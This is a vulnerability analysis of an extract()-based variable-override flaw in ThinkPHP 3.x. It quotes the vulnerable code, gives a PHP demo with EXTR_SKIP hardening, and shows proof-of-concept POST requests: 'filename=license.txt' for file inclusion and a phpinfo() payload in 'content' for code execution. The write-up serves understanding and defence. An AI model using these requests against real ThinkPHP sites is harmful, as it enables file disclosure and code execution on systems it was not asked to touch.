Vulnerability principle
ThinkPHP 3.x implements its own template engine carelessly: when a template is rendered, the array of template variables is imported into the rendering function's scope with extract($vars, EXTR_OVERWRITE). Any template variable whose name matches a local variable or parameter of that function (for example $filename or $content) silently replaces it, so a caller who controls template variable names controls which file is included or which code is evaluated. This is the arbitrary variable override at the root of both locations below.
Vulnerability Details
Vulnerability Location 1
thinkphp/library/think/view.class.php
This location is only reachable when the configuration option TMPL_ENGINE_TYPE is set to php (it is not the default, so the configuration file has to be changed for this path to be hit).
    if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // using PHP native templates
        // decompose the template variable array into independent variables
        extract($this->tVar, EXTR_OVERWRITE);
        // load the PHP template directly
        empty($content) ? include $templateFile : eval('?>'.$content);
    }
Because extract() runs with EXTR_OVERWRITE, a template variable named content replaces the function's own $content parameter. $content is normally empty here, so the ternary would include $templateFile; once it has been overwritten it is non-empty and the eval() branch executes the attacker-supplied string as PHP.
Vulnerability Location 2
thinkphp/library/think/storage/driver/file.class.php
    /**
     * Load a file
     * @access public
     * @param string $filename  file name
     * @param array  $vars      variables passed in
     * @return void
     */
    public function load($filename, $vars = null) {
        if (!is_null($vars))
            extract($vars, EXTR_OVERWRITE);
        include $filename;
    }
This is the loader the default Think template engine uses to include the compiled template, passing the template variables as $vars. A template variable named filename overwrites the $filename parameter before include() runs, so the file named by the attacker is included instead of the compiled template. Because include() parses the target as PHP, this is a local file inclusion that becomes code execution whenever the attacker can get PHP into any file on disk.
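To make the root cause concrete, the following is an added demonstration (my own code, not ThinkPHP's or the original write-up's) that reproduces the shape of both locations above with constructed files in a temporary directory, and shows the EXTR_SKIP alternative that stops template variables from clobbering the function's own parameters. The function names, file names and file contents are assumptions made for the demo.

```php
<?php
// Added demonstration, not ThinkPHP's own code: why extract($vars, EXTR_OVERWRITE)
// in the two locations above lets a template variable (and hence a POST field,
// once the controller does $this->assign($_POST)) overwrite the rendering
// function's own local variables. File names and contents below are constructed.

// Shape of location 2, Storage\Driver\File::load(): a template variable named
// "filename" replaces the parameter, and include() opens the attacker's file.
function loadVulnerable($filename, $vars = null)
{
    if (!is_null($vars)) {
        extract($vars, EXTR_OVERWRITE);
    }
    return include $filename;
}

// Shape of location 1, the TMPL_ENGINE_TYPE=php branch of View::fetch(): a
// template variable named "content" fills the otherwise empty $content, so the
// eval() branch runs attacker-supplied PHP instead of including the template.
function renderVulnerable($templateFile, $content, array $tVar)
{
    extract($tVar, EXTR_OVERWRITE);
    return empty($content) ? include $templateFile : eval('?>' . $content);
}

// Hardened variants: EXTR_SKIP never clobbers a variable that already exists in
// the function scope, so the parameters keep their values and the colliding
// template variables are simply not imported. (Renaming the parameters, as
// later ThinkPHP 3.2 releases do with $_filename / $_content, only helps until
// a template variable happens to use the new name.)
function loadHardened($filename, $vars = null)
{
    if (!is_null($vars)) {
        extract($vars, EXTR_SKIP);
    }
    return include $filename;
}

function renderHardened($templateFile, $content, array $tVar)
{
    extract($tVar, EXTR_SKIP);
    return empty($content) ? include $templateFile : eval('?>' . $content);
}

// Constructed fixture: a legitimate compiled template and a file standing in
// for whatever the attacker points "filename" at.
$dir = sys_get_temp_dir() . '/tp_extract_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/template.php", '<?php return "template says: " . $title;');
file_put_contents("$dir/other.txt", 'contents of a file the template was never meant to include');
$legit = "$dir/template.php";

// What $this->assign($_POST) hands to the engine: a harmless "title" plus the
// two hostile keys used by the requests in this write-up.
$fromPost = [
    'title'    => 'hello',
    'filename' => "$dir/other.txt",
    'content'  => '<?php return "attacker code ran with title=" . $title;',
];

// Location 2: include() now reads other.txt (its text is captured; include
// itself returns 1 for a file without a return statement).
ob_start();
loadVulnerable($legit, $fromPost);
echo "vulnerable load:   ", ob_get_clean(), PHP_EOL;
echo "hardened load:     ", loadHardened($legit, $fromPost), PHP_EOL;

// Location 1: $content was passed in empty, but the POST field fills it and
// eval() executes it, with the other template variables already in scope.
echo "vulnerable render: ", renderVulnerable($legit, '', $fromPost), PHP_EOL;
echo "hardened render:   ", renderHardened($legit, '', $fromPost), PHP_EOL;

unlink("$dir/template.php");
unlink("$dir/other.txt");
rmdir($dir);
```

Run it with the php CLI. The two "vulnerable" lines show the attacker's file contents and the attacker's return value; the two "hardened" lines show the legitimate template output both times. The trade-off of EXTR_SKIP is that a template which legitimately wants a variable called filename, vars or content no longer receives it; that collision is exactly what the attack exploits, so refusing it is the safer default.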
Vulnerability reproduction
Vulnerable server-side code (a test action that turns every POST field into a template variable and then renders the default template):
    public function test(){
        $this->assign($_POST); // every POST field becomes a template variable
        echo $this->fetch();   // render; the engine extract()s those variables
    }
Proof-of-concept request for vulnerability location 2 (local file inclusion; the POST field name must be lowercase filename to match the $filename parameter):
POST /onethink/index.php?s=/home/article/test HTTP/1.1
Host: 192.168.1.24
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

filename=license.txt
Call stack
Proof-of-concept request for vulnerability location 1 (code execution; requires TMPL_ENGINE_TYPE set to php). The content field overwrites $content and is passed to eval():
POST /onethink/index.php?s=/home/article/test HTTP/1.1
Host: 192.168.1.24
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

content=<?php phpinfo();
Call stack
Reference:
https://mp.weixin.qq.com/s/IuKjTS0Q0VVzuoeSwqZ5Gw
ThinkPHP 3.x arbitrary file inclusion (conditional) analysis